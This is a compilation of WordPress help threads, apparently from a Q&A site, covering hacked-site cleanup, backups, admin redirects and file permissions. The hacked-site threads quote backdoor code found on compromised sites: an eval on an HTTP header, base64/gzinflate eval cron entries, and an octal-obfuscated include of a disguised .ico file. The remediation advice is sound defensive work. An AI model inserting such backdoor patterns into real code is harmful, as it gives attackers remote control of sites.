My wordpress website being hacked with code eval($_SERVER['HTTP_81DB2B3'] - wordpress

I have a problem with my website, I get information from wordfence about my WordPress website getting hacked
enter image description here add found a code eval($_SERVER['HTTP_81DB2B3'] so i removed it but in a few second the code going back. someone, please help me

I had something very similar to this. Go to your cPanel and search for "Cron Jobs" and scroll down to see if there's any malicious cronjobs setup. You might have some that look like eval(gzinflate(base64_decode(.... that are essentially causing this to reoccur. Not a complete fix to this issue, but you'll have to delete those cronjobs to ensure that that line of code doesn't keep reappearing. In addition to that, you'll also need to make sure those cronjobs don't show up again. Use a plugin like Wordfence (suggested above as well) to look for malicious files and if it helps replace your home directory (except for wp-content and wp-config) with fresh files.

If your website got hacked then I guess more than 1 file was affected by it,
case-1: If you are able to access the Wordpress Backend In this case, if you are able to access the Wordpress backend then I suggest you
Step-1: Add one plugin called (Wordfence Security – Firewall & Malware Scan
) and scan your website with it.
Step-2: After scanning the site remove all suspicious code from the site.
Case 2: If you are not able to access the Wordpress backend then you have to update your Wordpress manually with the hosting file manager or FTP.
Please Note: Please take a backup of your website before do any changes.

Related

How Can I Fix a Hacked Wordpress Website?

I have seen lots of critical errors on my WordPress website. I attached a screenshot below that shows some of these issues. Please look at this and provide some suggestions so that I can fix this problem.
Thank you so much.
Depends how badly broken your site has become.
What is it doing to make you think it's been hacked? Is it just the warnings in the Wordfence scan report?
Before going much further you should for sure grab a backup of your database, wp-config.php, and the contents of the directories wp-content/themes, wp-content/uploads, and wp-content/plugins. Might be a good idea to make a separate backup of the entire WordPress installation directory.
Since you can still access the administration panel, might as well change your password just to be safe. Are there multiple users for your WP installation?
What changes have been made if you click "Details" button in the Wordfence scan?
If you're sure changes to the wp-core files are due to a hack, you can try to repair them using Wordfence's repair feature--it'll restore them to their base WordPress version. But if significant differences are showing for dozens of core files, might be a good idea start over with a clean installation of WordPress.
You'll also want to track down what allowed these malicious changes to be made (has an unknown IP logged into your administration panel recently? Are you using a plugin with a known security issue?), or it'll just happen again.

Wordpress site hacked?

It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and put strong password username
changed cpanel/FTP password with strong one
Implemented iTheme Security
Updated Wordpress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you're already connected with your DB
Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
Reinstall all plugins, fresh downloads
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
you can also visit this link too
https://naderzad.info/web-development/wordpress-code-injection/

How to manually back up wordpress website

I have never used wordpress before, My boss has given me access to a site which was created using wordpress. then He asked me how I am going to make sure I don't break the site accidentally, I told him I would create a backup on my local computer so that all my changes can be restored if I mess up.
I have the wordpress dashboard up. How do I back up EVERYTHING, I hear there are two separate things I need to back up? someone please help me.
PS: I don't think he would like me to do this with out the use of additional plugins.
There are two separate things:
Your website database. Simply export all the MySQL tables from the database, which is dedicated to your site.
The site files, everything you've got under WordPress folder, /wp-includes, /wp-content, /wp-admin directories and all files.
This should do it all. You can test on your localhost to make sure it's everything that's necessary.
You can backup your WordPress either from your hosting account (preferable) or from your WP dashboard.
You need to backup two things - all the files (the root of your Wordpress installation) and the database for your WP installation.
Since you only have access to the dashboard, you have to use plugin for this.
Two of my favorite free backup plugins are:
BackupWordpress - https://wordpress.org/plugins/backupwordpress/
BackWPup - https://wordpress.org/plugins/backwpup/
They are intuitive and easy to work with, so you shouldn't have issues.
If you go to the dashboard go to "tools" in the left toolbar. Select "export". On the export page you can report that you want to export "all content". This will get you the items that you need from the server.
Then you need to install wordpress to your machine. You can download that from: https://wordpress.org/download/
Once you have that on your machine you also need a local server to run it and test it. I like WAMP, but it partially depends on your operating system. I suggest the following video to get you up to speed on how to get the localhost set up and running: https://www.youtube.com/watch?v=snFzbPm_RUE
Hope this helps!

Broken Wordpress Admin

I have a client who has asked me to start working on their Wordpress site. The admin page is broken and I do not have access to the database yet (I am trying to track down the previous people who worked on it). It is quite messy, I know.
What I am doing now is migrating peices over to a new wordpress site using Wamp server just to get it functional, but I am wondering if the solution is simpler than that. Ideally, I would just fix the the login, but I have minimal Wordpress experience and don't know where to start.
Here is the website: http://fundafighter.com
If you go to http://fundafighter.com/wp-admin you'll notice that it is broken. I reroutes to "login-2", which I don't think is normal. So far I haven't found any folder with that title...
I would log into the site via FTP, check the wp-config.php file for any redirects for wp-login.php. Then, check the .htaccess file for the same. Remove any references.
If you get that page working, and you need to reset the password, I would follow this tutorial through phpMyAdmin:
https://codex.wordpress.org/Resetting_Your_Password#Through_phpMyAdmin

Cannot see changes in Wordpress in FTP client and vice versa

I am having some problems with Wordpress 3.7. I think they may be related and have something to do with a file ownership/rights issue but I am completely stuck.
I am using the default theme and I have uploaded a new header image
several times through the WP admin interface. Now that I am happy
with the image, I want to delete the old images. Firebug tells me
they are in [my wp root]/wp-content/uploads/2014/01. However, in my
FTP client, this directory is not visible. I only see [my wp
root]/wp-content/uploads/2013
.
When I log into the Wordpress admin interface, it tells me I should upgrade to 3.8. When I tell it to go ahead and give it my FTP credentials, it begins but gets stuck at "Verifying the unpacked files…". I get no error messages and when I give up and leave the page, there are no reports about a failed update. It just keeps showing me the "please update" message.
I am using the default theme and want to change style.css. I cannot do this in the theme editor, it tells me I have to make the file writable first, even after I give all the theme files 777 access in my FTP client (which probably is not a good idea). If I edit the file offline instead and then upload it via FTP, this doesn't have any effect. I can even delete the entire file and still nothing changes at the frontend.
I have tried to create a child theme through the FTP client but it does not show up in the WP backend.
The site is on a shared hosting platform. I can't find the details at the moment but it's a fairly regular setup (Linux, Apache, MySQL). I am testing in Firefox and caching is turned off. If I log out, and log back in again: same problems.
It is almost as if I am FTP-ing the wrong computer but I am really not. What am I missing?
Problem solved. I finally asked my hosting provider and as it turns out they had adjusted a few settings, making them too restrictive.

Resources